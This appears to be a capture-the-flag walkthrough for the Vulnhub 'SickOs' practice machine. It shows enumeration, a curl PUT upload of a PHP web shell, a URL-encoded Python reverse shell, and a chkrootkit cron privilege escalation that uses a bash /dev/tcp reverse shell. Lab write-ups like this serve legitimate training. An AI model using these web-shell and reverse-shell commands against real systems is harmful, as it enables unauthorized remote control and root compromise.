Sickos

Vulnhub virtual machine; OSCP prep box, included a webserver enumeration of OPTIONS which led to a PUT upload of reverse shell. Priv-escalation required a pivot through chkrootkit and a reverse shell executed by crontab.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Locate VM on network

1
netdiscover -r 192.168.56.0/24

Target: 192.168.56.104

Enumeration

Nmap Scan

1
nmap -sV -sC -oA nmap/sickos 192.168.56.104

Investigate HTTP server http://192.168.56.104

source:

blow.jpg downloaded and check for stegonography

1
file blow.jpg

1
strings blow.jpg

Gobuster HTTP server

1
gobuster -u http://192.168.56.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-webservices.out

/test directory found and possible other different looking directory.

/test Directory

lighttpd/1.4.28 identified

Searchsploit

1
searchsploit lighttpd

“mod userdir Information Disclosure” looks interesting - download locally and view

Security focus website

This might be worth investigating here in the future.

Checking the webserver OPTIONS of /test

1
curl -v -X OPTIONS http://192.168.56.104/test

Webserver allows *put*. We can send quick one liner to it and see if it executes.

RCE

PUT shell.php on webserver

1
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.216.128/test/shell.php

uploaded completed!

File is indeed on remote box now to test code execution.

1
192.168.56.104/test/shell.php?cmd=whoami

Reverse shell use standard pentestmonkey reverse shell and URL encoded it. - I did encounter issues with the port which lead me to believe we might be dealing with some type of firewall internally.

1
python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.56.101%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

We have a partial shell now and just require to upgrade.

Upgrade to tty

1
2
3
4
python -c 'import pty; pty.spawn("/bin/bash")'
press cntl+z 
stty raw -echo
fg (enter)

cat /etc/passwd

checking for chkrootkit

Priv-Esc

version test

1
chkrootkit -V

Luckly there is an exploit for verison 0.49 found at: https://www.exploit-db.com/exploits/33899/

Priv-esc is accomplished by writing an update file within /tmp which gets executed by the cron.

Root

Create update file We need to push this reverse shell via 443 to bypass firewall

1
printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.56.101/443 0>&1\n' >> /tmp/update

next change the chmod

1
chmod 777 update

wait for callback on port 443

Bring me the root!

-exec